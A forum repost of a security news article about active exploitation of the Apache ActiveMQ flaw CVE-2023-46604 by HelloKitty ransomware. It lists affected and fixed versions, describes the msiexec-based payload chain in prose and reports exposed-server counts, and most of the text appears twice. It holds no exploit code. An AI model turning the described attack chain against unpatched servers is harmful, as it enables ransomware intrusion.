Lord777
Professional
- Messages
- 2,579
- Reaction score
- 1,491
- Points
- 113
A critical vulnerability in more than 3,000 servers has opened the way for large-scale cyber attacks.
Cybersecurity experts have detected suspicious activity that may be related to the use of a recently discovered critical vulnerability in the Apache ActiveMQ messaging service. An error in the security system can lead to remote code execution.
According to the information security company Rapid7, the attackers tried to deploy a ransomware program on the target systems in order to demand a ransom for decrypting the data of the victim organizations. After studying the ransom note and the available data, experts attributed the activity to the HelloKitty ransomware family, the source code of which leaked to the network in early October.
It is noted that the hacks were carried out using the vulnerability CVE-2023-46604 (CVSS 10.0), which allows an attacker to execute arbitrary commands on Apache ActiveMQ servers. The issue was resolved in the latest ActiveMQ releases of versions 5.15.16, 5.16.7, 5.17.6, or 5.18.3, which were released in late September.
The vulnerability affects the following versions:
After disclosing information about the vulnerabilities, the POC code of the exploit and additional technical details were made public on the network. According to the Rapid7 researchers, the activity on the affected networks is "consistent with what one would expect from exploiting CVE-2023-46604."
Successful use of the vulnerability ends with an attempt by an attacker to upload files named M2.png and M4.png to a remote machine via the Windows Installer (msiexec). Both MSI files contain a 32-bit executable .NET-a file called dllloader, which, in turn, loads a load called EncDLL, encrypted in Base64 and functioning as ransomware. The program searches for and terminates a certain set of processes, and then starts the encryption process by adding the "locked" extension to the encrypted files.
According to the Shadowserver Foundation, as of November 1, 2023, 3326 vulnerable ActiveMQ instances were found accessible via the Internet, most of them located in China, the United States, Germany, South Korea, and India. Due to the active exploitation of the vulnerability, users are strongly advised to update to the latest version of ActiveMQ as soon as possible and check their networks for signs of compromise.
Cybersecurity experts have detected suspicious activity that may be related to the use of a recently discovered critical vulnerability in the Apache ActiveMQ messaging service. An error in the security system can lead to remote code execution.
According to the information security company Rapid7, the attackers tried to deploy a ransomware program on the target systems in order to demand a ransom for decrypting the data of the victim organizations. After studying the ransom note and the available data, experts attributed the activity to the HelloKitty ransomware family, the source code of which leaked to the network in early October.
It is noted that the hacks were carried out using the vulnerability CVE-2023-46604 (CVSS 10.0), which allows an attacker to execute arbitrary commands on Apache ActiveMQ servers. The issue was resolved in the latest ActiveMQ releases of versions 5.15.16, 5.16.7, 5.17.6, or 5.18.3, which were released in late September.
The vulnerability affects the following versions:
- Apache ActiveMQ 5.18.0 to 5.18.3;
- Apache ActiveMQ 5.17.0 to 5.17.6;
- Apache ActiveMQ 5.16.0 to 5.16.7;
- Apache ActiveMQ up to version 5.15.16;
- Apache ActiveMQ Legacy OpenWire Module from 5.18.0 to 5.18.3;
- Apache ActiveMQ Legacy OpenWire Module from 5.17.0 to 5.17.6;
- Apache ActiveMQ Legacy OpenWire Module from 5.16.0 to 5.16.7;
- Apache ActiveMQ Legacy OpenWire Module from 5.8.0 to 5.15.16.
After disclosing information about the vulnerabilities, the POC code of the exploit and additional technical details were made public on the network. According to the Rapid7 researchers, the activity on the affected networks is "consistent with what one would expect from exploiting CVE-2023-46604."
Successful use of the vulnerability ends with an attempt by an attacker to upload files named M2.png and M4.png to a remote machine via the Windows Installer (msiexec). Both MSI files contain a 32-bit executable .NET-a file called dllloader, which, in turn, loads a load called EncDLL, encrypted in Base64 and functioning as ransomware. The program searches for and terminates a certain set of processes, and then starts the encryption process by adding the "locked" extension to the encrypted files.
According to the Shadowserver Foundation, as of November 1, 2023, 3326 vulnerable ActiveMQ instances were found accessible via the Internet, most of them located in China, the United States, Germany, South Korea, and India. Due to the active exploitation of the vulnerability, users are strongly advised to update to the latest version of ActiveMQ as soon as possible and check their networks for signs of compromise.
